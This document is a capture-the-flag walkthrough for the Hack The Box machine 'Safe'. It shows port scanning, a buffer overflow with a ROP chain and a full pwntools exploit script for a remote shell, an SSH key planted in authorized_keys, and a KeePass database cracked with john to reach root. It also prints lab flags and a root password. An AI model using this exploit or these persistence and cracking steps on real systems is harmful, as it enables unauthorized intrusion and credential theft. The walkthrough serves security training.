Safe

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.147 -oN allPorts

• -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

• --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

• -p- scanning the entire port range, from 1 to 65535.

• -T5 insane mode, it is the fastest mode of the nmap time template.

• -Pn assume the host is online.

• -n scan without reverse DNS resolution.

• -oN save the scan result into a file, in this case the allports file.

# Nmap 7.93 scan initiated Mon Mar 13 12:23:11 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.147
Nmap scan report for 10.10.10.147
Host is up (0.059s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
1337/tcp open  waste

# Nmap done at Mon Mar 13 12:23:25 2023 -- 1 IP address (1 host up) scanned in 13.31 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p22,80,1337 10.10.10.147 -oN targeted

• -sC performs the scan using the default set of scripts.

• -sV enables version detection.

• -oN save the scan result into file, in this case the targeted file.

# Nmap 7.93 scan initiated Mon Mar 13 12:23:40 2023 as: nmap -sCV -p22,80,1337 -Pn -oN targeted 10.10.10.147
Nmap scan report for 10.10.10.147
Host is up (0.050s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 6d7c813d6a3df95f2e1f6a97e500bade (RSA)
|   256 997e1e227672da3cc9617d74d78033d2 (ECDSA)
|_  256 6a6bc38e4b28f76085b162ff54bcd8d6 (ED25519)
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works
1337/tcp open  waste?
| fingerprint-strings: 
|   DNSStatusRequestTCP: 
|     07:23:58 up 1 min, 0 users, load average: 0.05, 0.02, 0.00
|   DNSVersionBindReqTCP: 
|     07:23:53 up 1 min, 0 users, load average: 0.05, 0.02, 0.00
|   GenericLines: 
|     07:23:42 up 1 min, 0 users, load average: 0.06, 0.03, 0.01
|     What do you want me to echo back?
|   GetRequest: 
|     07:23:48 up 1 min, 0 users, load average: 0.05, 0.03, 0.00
|     What do you want me to echo back? GET / HTTP/1.0
|   HTTPOptions: 
|     07:23:48 up 1 min, 0 users, load average: 0.05, 0.03, 0.00
|     What do you want me to echo back? OPTIONS / HTTP/1.0
|   Help: 
|     07:24:03 up 1 min, 0 users, load average: 0.04, 0.02, 0.00
|     What do you want me to echo back? HELP
|   NULL: 
|     07:23:42 up 1 min, 0 users, load average: 0.06, 0.03, 0.01
|   RPCCheck: 
|     07:23:48 up 1 min, 0 users, load average: 0.05, 0.03, 0.00
|   RTSPRequest: 
|     07:23:48 up 1 min, 0 users, load average: 0.05, 0.03, 0.00
|     What do you want me to echo back? OPTIONS / RTSP/1.0
|   SSLSessionReq, TerminalServerCookie: 
|     07:24:03 up 1 min, 0 users, load average: 0.04, 0.02, 0.00
|     What do you want me to echo back?
|   TLSSessionReq: 
|     07:24:04 up 1 min, 0 users, load average: 0.04, 0.02, 0.00
|_    What do you want me to echo back?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.93%I=7%D=3/13%Time=640F07C3%P=x86_64-pc-linux-gnu%r(NU
SF:LL,3E,"\x2007:23:42\x20up\x201\x20min,\x20\x200\x20users,\x20\x20load\x
SF:20average:\x200\.06,\x200\.03,\x200\.01\n")%r(GenericLines,63,"\x2007:2
SF:3:42\x20up\x201\x20min,\x20\x200\x20users,\x20\x20load\x20average:\x200
SF:\.06,\x200\.03,\x200\.01\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20ec
SF:ho\x20back\?\x20\r\n")%r(GetRequest,71,"\x2007:23:48\x20up\x201\x20min,
SF:\x20\x200\x20users,\x20\x20load\x20average:\x200\.05,\x200\.03,\x200\.0
SF:0\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20echo\x20back\?\x20GET\x20
SF:/\x20HTTP/1\.0\r\n")%r(HTTPOptions,75,"\x2007:23:48\x20up\x201\x20min,\
SF:x20\x200\x20users,\x20\x20load\x20average:\x200\.05,\x200\.03,\x200\.00
SF:\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20echo\x20back\?\x20OPTIONS\
SF:x20/\x20HTTP/1\.0\r\n")%r(RTSPRequest,75,"\x2007:23:48\x20up\x201\x20mi
SF:n,\x20\x200\x20users,\x20\x20load\x20average:\x200\.05,\x200\.03,\x200\
SF:.00\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20echo\x20back\?\x20OPTIO
SF:NS\x20/\x20RTSP/1\.0\r\n")%r(RPCCheck,3E,"\x2007:23:48\x20up\x201\x20mi
SF:n,\x20\x200\x20users,\x20\x20load\x20average:\x200\.05,\x200\.03,\x200\
SF:.00\n")%r(DNSVersionBindReqTCP,3E,"\x2007:23:53\x20up\x201\x20min,\x20\
SF:x200\x20users,\x20\x20load\x20average:\x200\.05,\x200\.02,\x200\.00\n")
SF:%r(DNSStatusRequestTCP,3E,"\x2007:23:58\x20up\x201\x20min,\x20\x200\x20
SF:users,\x20\x20load\x20average:\x200\.05,\x200\.02,\x200\.00\n")%r(Help,
SF:67,"\x2007:24:03\x20up\x201\x20min,\x20\x200\x20users,\x20\x20load\x20a
SF:verage:\x200\.04,\x200\.02,\x200\.00\n\nWhat\x20do\x20you\x20want\x20me
SF:\x20to\x20echo\x20back\?\x20HELP\r\n")%r(SSLSessionReq,64,"\x2007:24:03
SF:\x20up\x201\x20min,\x20\x200\x20users,\x20\x20load\x20average:\x200\.04
SF:,\x200\.02,\x200\.00\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20echo\x
SF:20back\?\x20\x16\x03\n")%r(TerminalServerCookie,63,"\x2007:24:03\x20up\
SF:x201\x20min,\x20\x200\x20users,\x20\x20load\x20average:\x200\.04,\x200\
SF:.02,\x200\.00\n\nWhat\x20do\x20you\x20want\x20me\x20to\x20echo\x20back\
SF:?\x20\x03\n")%r(TLSSessionReq,64,"\x2007:24:04\x20up\x201\x20min,\x20\x
SF:200\x20users,\x20\x20load\x20average:\x200\.04,\x200\.02,\x200\.00\n\nW
SF:hat\x20do\x20you\x20want\x20me\x20to\x20echo\x20back\?\x20\x16\x03\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 13 12:25:12 2023 -- 1 IP address (1 host up) scanned in 91.85 seconds

The website shows the Apache2 Debian Default Page.

There is a comment in the source code saying that a binary called myapp, which is running on port 1337, can be downloaded from here.

Let's download it.

wget http://10.10.10.147/myapp; chmod +x myapp

If we run the binary, we'll see an output that looks like the one from the uptime command. Then, it will ask for input, and it will print back the input we just entered.

./myapp

 20:02:18 up  6:45,  6 users,  load average: 0.08, 0.10, 0.09

What do you want me to echo back? test
test

If we try to enter a bunch of A characters, the program crashes. There could potentially be a buffer overflow vulnerability.

./myapp

 20:04:38 up  6:48,  6 users,  load average: 0.08, 0.08, 0.08

What do you want me to echo back? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
zsh: segmentation fault  ./myapp

Exploitation

For further inspection of the binary, let's open ghidra and create a new project. Select Non-Shared Project, select the project directory, and set the name of the project.

Then, import the myapp binary. We will see that it is a 64 bits ELF binary.

Drag and drop the binary into the CodeBrowser.

Then, press Ok, and Analyze.

Under Functions, select the main function, and we'll see that the local_78 variable is saving the input that the user enters. Note that the buffer has a size of 112 bytes. If we enter more than the buffer size then we start overwriting the stack and the program crashes.

Buffer Overflow

Let's start by finding the offset. Run the binary with gdb.

gdb ./myapp

Create a pattern of 200 bytes long.

gef➤ pattern create 200

[+] Generating a pattern of 200 bytes (n=8)
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa
[+] Saved as '$_gef0'

Now, copy the pattern, run the program, and enter it. The program should crash.

gef➤ r

Starting program: /home/alfa8sa/HTB/machines/safe/myapp 
[*] Failed to find objfile or not a valid file format: [Errno 2] No such file or directory: 'system-supplied DSO at 0x7ffff7fc9000'
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[Detaching after vfork from child process 261629]
 20:15:47 up  6:59,  6 users,  load average: 0.09, 0.10, 0.09

What do you want me to echo back? aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaa
aanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaaaaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaa
aafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaa
aawaaaaaaaxaaaaaaayaaaaaaa

Program received signal SIGSEGV, Segmentation fault.
0x00000000004011ac in main ()
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0x0               
$rbx   : 0x007fffffffe1f8  →  0x007fffffffe4d8  →  "/home/alfa8sa/HTB/machines/safe/myapp"
$rcx   : 0x007ffff7ebc190  →  0x5877fffff0003d48 ("H="?)
$rdx   : 0x1               
$rsp   : 0x007fffffffe0e8  →  "paaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaava[...]"
$rbp   : 0x616161616161616f ("oaaaaaaa"?)
$rsi   : 0x1               
$rdi   : 0x007ffff7f98a10  →  0x0000000000000000
$rip   : 0x000000004011ac  →  <main+77> ret 
$r8    : 0x00000000405328  →  "raaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxa[...]"
$r9    : 0x007ffff7f325c0  →  <__memmove_ssse3+320> movaps xmm1, XMMWORD PTR [rsi+0x10]
$r10   : 0x007ffff7dcdfd8  →  0x10002200006647 ("Gf"?)
$r11   : 0x202             
$r12   : 0x0               
$r13   : 0x007fffffffe208  →  0x007fffffffe4fe  →  "COLORTERM=truecolor"
$r14   : 0x0               
$r15   : 0x007ffff7ffd020  →  0x007ffff7ffe2e0  →  0x0000000000000000
$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x33 $ss: 0x2b $ds: 0x00 $es: 0x00 $fs: 0x00 $gs: 0x00 
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x007fffffffe0e8│+0x0000: "paaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaava[...]"      ← $rsp
0x007fffffffe0f0│+0x0008: "qaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawa[...]"
0x007fffffffe0f8│+0x0010: "raaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxa[...]"
0x007fffffffe100│+0x0018: "saaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaaya[...]"
0x007fffffffe108│+0x0020: "taaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa"
0x007fffffffe110│+0x0028: "uaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa"
0x007fffffffe118│+0x0030: "vaaaaaaawaaaaaaaxaaaaaaayaaaaaaa"
0x007fffffffe120│+0x0038: "waaaaaaaxaaaaaaayaaaaaaa"
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
     0x4011a1 <main+66>        call   0x401030 <puts@plt>
     0x4011a6 <main+71>        mov    eax, 0x0
     0x4011ab <main+76>        leave  
 →   0x4011ac <main+77>        ret    
[!] Cannot disassemble from $PC
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "myapp", stopped 0x4011ac in main (), reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x4011ac → main()
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

Now, we know that there are 120 bytes before starting to overwrite RSP, which is the register that controls the flow of the program.

gef➤ pattern offset $rsp

[+] Searching for '$rsp'
[+] Found at offset 120 (little-endian search) likely
[+] Found at offset 113 (big-endian search)

To prove that we have control of RSP, send a string with 120 A characters, 8 B characters, and 20 C characters.

What do you want me to echo back? AAA...AAABBB...BBCCC...CCC

──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0x0               
$rbx   : 0x007fffffffe1f8  →  0x007fffffffe4d8  →  "/home/alfa8sa/HTB/machines/safe/myapp"
$rcx   : 0x007ffff7ebc190  →  0x5877fffff0003d48 ("H="?)
$rdx   : 0x1               
$rsp   : 0x007fffffffe0e8  →  "BBBBBBBBCCCCCCCCCCCCCCCCCCCC"
$rbp   : 0x4141414141414141 ("AAAAAAAA"?)
$rsi   : 0x1               
$rdi   : 0x007ffff7f98a10  →  0x0000000000000000
$rip   : 0x000000004011ac  →  <main+77> ret 
$r8    : 0x000000004052f4  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBCCCCCC[...]"
$r9    : 0x007ffff7f325c0  →  <__memmove_ssse3+320> movaps xmm1, XMMWORD PTR [rsi+0x10]
$r10   : 0x007ffff7dcdfd8  →  0x10002200006647 ("Gf"?)
$r11   : 0x202             
$r12   : 0x0               
$r13   : 0x007fffffffe208  →  0x007fffffffe4fe  →  "COLORTERM=truecolor"
$r14   : 0x0               
$r15   : 0x007ffff7ffd020  →  0x007ffff7ffe2e0  →  0x0000000000000000
$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x33 $ss: 0x2b $ds: 0x00 $es: 0x00 $fs: 0x00 $gs: 0x00 
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x007fffffffe0e8│+0x0000: "BBBBBBBBCCCCCCCCCCCCCCCCCCCC"         ← $rsp
0x007fffffffe0f0│+0x0008: "CCCCCCCCCCCCCCCCCCCC"
0x007fffffffe0f8│+0x0010: "CCCCCCCCCCCC"
0x007fffffffe100│+0x0018: 0x00000043434343 ("CCCC"?)
0x007fffffffe108│+0x0020: 0x007fffffffe1f8  →  0x007fffffffe4d8  →  "/home/alfa8sa/HTB/machines/safe/myapp"
0x007fffffffe110│+0x0028: 0x007fffffffe1f8  →  0x007fffffffe4d8  →  "/home/alfa8sa/HTB/machines/safe/myapp"
0x007fffffffe118│+0x0030: 0xb39819e4d6e6d979
0x007fffffffe120│+0x0038: 0x0000000000000000
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
     0x4011a1 <main+66>        call   0x401030 <puts@plt>
     0x4011a6 <main+71>        mov    eax, 0x0
     0x4011ab <main+76>        leave  
 →   0x4011ac <main+77>        ret    
[!] Cannot disassemble from $PC
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "myapp", stopped 0x4011ac in main (), reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x4011ac → main()
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤

As seen, the B characters appear in RSP. If we check the memory protections of the binary, we'll see that NX is enabled. Which means that it is not possible to execute code from the stack.

gef➤ checksec

[+] checksec for '/home/alfa8sa/HTB/machines/safe/myapp'
Canary                        : ✘ 
NX                            : ✓ 
PIE                           : ✘ 
Fortify                       : ✘ 
RelRO                         : Partial

Going back to the Ghidra CodeBrowser we'll see that there is another function called test. This function is copying the value of RSP and pasting it into RDI. Then, it is doing a JMP order to R13.

We can try to exploit ROP.

Return Oriented Programming (or ROP) is the idea of chaining together small snippets of assembly with stack control to cause the program to do more complex things.

The idea is to be able to run the system() function with /bin/sh as an argument so the program spawns a shell. To use arguments in functions, we'll have to store those arguments in the following registries, ordered from first to last, before using them.

rdi -> rsi -> rdx -> rcx -> r8 -> r9

The strategy will be to put the /bin/sh string in RSP. As the test function is copying the value of RSP into RDI, the system() function will look for the argument in RDI, which will be /bin/bash\x00. The top of the stack will be copied to RDI, so we have to put the string right before RSP, in this case, the string is 8 bytes long, so the junk will be 112 bytes long followed by the /bin/bash\x00 string.

offset = 112
junk = b"A" * offset
bin_sh = b"/bin/sh\x00"

As the test function is doing a JMP order to R13, we have to search for a gadget pop r13. We find a gadget with ropper, that does pop r13; pop r14; pop r15. This way we can load the address of the system() function into R13, and fill R14 and R15 with null bytes.

ropper --file myapp --search "pop r13"

[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop r13

[INFO] File: myapp
0x0000000000401206: pop r13; pop r14; pop r15; ret;

pop_r13 = p64(0x401206)
null = p64(0x0)

Now we need to know the address of system() to load it into R13.

objdump -D myapp | grep system

0000000000401040 <system@plt>:
  401040:       ff 25 da 2f 00 00       jmp    *0x2fda(%rip)        # 404020 <system@GLIBC_2.2.5>
  40116e:       e8 cd fe ff ff          call   401040 <system@plt>

system = p64(0x401040)

Finally, we need the address of the test function itself, so we can run it.

objdump -D myapp | grep test

  40100b:       48 85 c0                test   %rax,%rax
  4010c2:       48 85 c0                test   %rax,%rax
  401104:       48 85 c0                test   %rax,%rax
0000000000401152 <test>:

test = p64(0x401152)

Let's go through the whole process again. The final payload will consist of the junk, which is 112 bytes long, plus the /bin/sh\x00 string.

• The junk, which is 112 bytes long, plus the /bin/sh\x00 string. This whole thing will be 120 bytes long, then we'll reach RSP. We do this because the test function is copying the top of the stack and pasting it into RDI, which will be the first argument for the system() function.

• Then, we need to run the system() function. As test is doing a JMP order to R13, we found a gadget that makes a pop r13, making it possible to put the address of system() into R13. The gadget also does pop r14; pop r15, so we fill it with null bytes.

• Finally, we call the test function so everything gets executed and a shell is spawned.

payload = junk + bin_sh + pop_r13 + system + null + null + test

The final script will look like this.

#!/usr/bin/python3

from pwn import *

context(os="linux", arch="amd64")
p = remote("10.10.10.147", 1337)

offset = 112
junk = b"A" * offset
bin_sh = b"/bin/sh\x00"
pop_r13 = p64(0x401206)
null = p64(0x0)
system = p64(0x401040)
test = p64(0x401152)

payload = junk + bin_sh + pop_r13 + system + null + null + test

p.sendline(payload)
p.interactive()

Run the script, and get a shell as user. Then, we'll be able to grab the user flag.

python overflow.py

[+] Opening connection to 10.10.10.147 on port 1337: Done
[*] Switching to interactive mode
 16:43:23 up  9:20,  0 users,  load average: 0.00, 0.00, 0.00
$ whoami
user
$ cat /home/user/user.txt
7f8eaee3707f8f485547538ac01acbff

Privilege Escalation

To get a more stable shell, as port 22 is open, we can create a pair of SSH keys, copy the public key.

ssh-keygen

cat ~/.ssh/id_rsa.pub | tr -d '\n' | xclip -sel clip

And put it into the authorized_keys file of the victim machine.

echo "ssh-rsa AAA...o50= root@alfa8sa" > /home/user/.ssh/authorized_keys

Now login via SSH without a password as user.

ssh user@10.10.10.147

There are a few images and one interesting file called MyPasswords.kdbx in user home directory.

ls -la /home/user

total 11288
drwxr-xr-x 4 user user    4096 Mar 13 12:43 .
drwxr-xr-x 3 root root    4096 Jul 26  2022 ..
lrwxrwxrwx 1 user user       9 May 13  2019 .bash_history -> /dev/null
-rw-r--r-- 1 user user     220 May 13  2019 .bash_logout
-rw-r--r-- 1 user user    3526 May 13  2019 .bashrc
-rw-r--r-- 1 user user 1907614 May 13  2019 IMG_0545.JPG
-rw-r--r-- 1 user user 1916770 May 13  2019 IMG_0546.JPG
-rw-r--r-- 1 user user 2529361 May 13  2019 IMG_0547.JPG
-rw-r--r-- 1 user user 2926644 May 13  2019 IMG_0548.JPG
-rw-r--r-- 1 user user 1125421 May 13  2019 IMG_0552.JPG
-rw-r--r-- 1 user user 1085878 May 13  2019 IMG_0553.JPG
-rwxr-xr-x 1 user user   16592 May 13  2019 myapp
-rw-r--r-- 1 user user    2446 May 13  2019 MyPasswords.kdbx
drwxr-xr-x 2 user user    4096 Mar 13 12:43 .nano
-rw-r--r-- 1 user user     675 May 13  2019 .profile
drwx------ 2 user user    4096 Mar 13 16:49 .ssh
-rw------- 1 user user      33 Mar 13 07:22 user.txt

Let's transfer all the images and the KeePass file to our local machine.

scp user@10.10.10.147:/home/user/IMG* .

scp user@10.10.10.147:/home/user/MyPasswords.kdbx .

The .kdbx files contain a password database but are only accessible with a passphrase. In addition to the passphrase, you can also protect the file with a file key. We could get the hash of the .kdbx file encrypted with every image, and try to break it with john.

for img in $(ls | grep .JPG); do keepass2john -k $img MyPasswords.kdbx >> hashes;done

Then, try to break one of the hashes.

john -w=/usr/share/wordlists/rockyou.txt hashes

Using default input encoding: UTF-8
Loaded 6 password hashes with 6 different salts (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bullshit         (MyPasswords)

Now that we have a password, we just have to go one by one image and see what is the right combination of the password and image. We'll see that the right image is IMG_0547.JPG.

keepassxc MyPasswords.kdbx

There is one entry with the password of the root user.

Become the root user, and all we have to do is reap the harvest and take the root flag.

su root

Password: u3v2249dl9ptv465cogl3cnpo3fyhk
root@safe:/home/user# whoami
root
root@safe:/home/user# cat /root/root.txt 
4f328ee2d96618e3269edbf3eb2e57e4